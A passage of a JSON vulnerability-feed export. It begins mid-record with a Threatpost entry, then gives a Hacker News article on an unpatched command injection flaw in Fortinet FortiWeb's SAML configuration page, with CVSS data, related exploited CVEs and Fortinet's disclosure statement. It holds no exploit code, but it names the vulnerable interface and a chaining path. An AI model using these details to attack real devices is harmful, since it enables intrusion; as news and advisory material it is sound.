"obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:13", "description": "Details have emerged about a new unpatched security vulnerability in Fortinet's web application firewall (WAF) appliances that could be abused by a remote, authenticated attacker to execute malicious commands on the system.\n\n\"An OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow 
a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page,\" cybersecurity firm Rapid7 [said](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) in an advisory published Tuesday. \"This vulnerability appears to be related to [CVE-2021-22123](<https://nvd.nist.gov/vuln/detail/CVE-2021-22123>), which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\"\n\nRapid7 said it discovered and reported the issue in June 2021. Fortinet is expected to release a patch at the end of August with version Fortiweb 6.4.1.\n\nThe command injection flaw is yet to be assigned a CVE identifier, but it has a severity rating of 8.7 on the CVSS scoring system. Successful exploitation of the vulnerability can allow authenticated attackers to execute arbitrary commands as the root user on the underlying system via the SAML server configuration page.\n\n\"An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\" Rapid7's Tod Beardsley said. \"They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ.\"\n\nRapid7 also warns that while authentication is a prerequisite for achieving arbitrary command execution, the exploit could be chained with an authentication bypass flaw, such as [CVE-2020-29015](<https://nvd.nist.gov/vuln/detail/CVE-2020-29015>). 
In the interim, users are advised to block access to the FortiWeb device's management interface from untrusted networks, including taking steps to prevent direct exposure to the internet.\n\nAlthough there is no evidence that the new security issue has been exploited in the wild, it's worth noting that unpatched Fortinet servers have been a lucrative target for financially motivated and state-sponsored threat actors alike.\n\nEarlier this April, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://www.ic3.gov/Media/News/2021/210402.pdf>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) to compromise systems belonging to government and commercial entities.\n\nIn the same month, Russian cybersecurity company Kaspersky [revealed](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) that threat actors exploited the CVE-2018-13379 vulnerability in FortiGate VPN servers to gain access to enterprise networks in European countries to deploy the Cring ransomware.\n\n**_Update: _**Fortinet shared the following statement with The Hacker News:\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the Fortinet PSIRT Policy page, which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. 
As such, we had expected that Rapid7 hold any findings prior to the end of our 90-day Responsible disclosure window. We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window. We are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T03:41:00", "type": "thn", "title": "Unpatched Remote Hacking Flaw Disclosed in Fortinet's FortiWeb WAF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T06:50:20", "id": "THN:FCBB400B24C7B24CD6B5136FA8BE38D3", "href": 
"https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}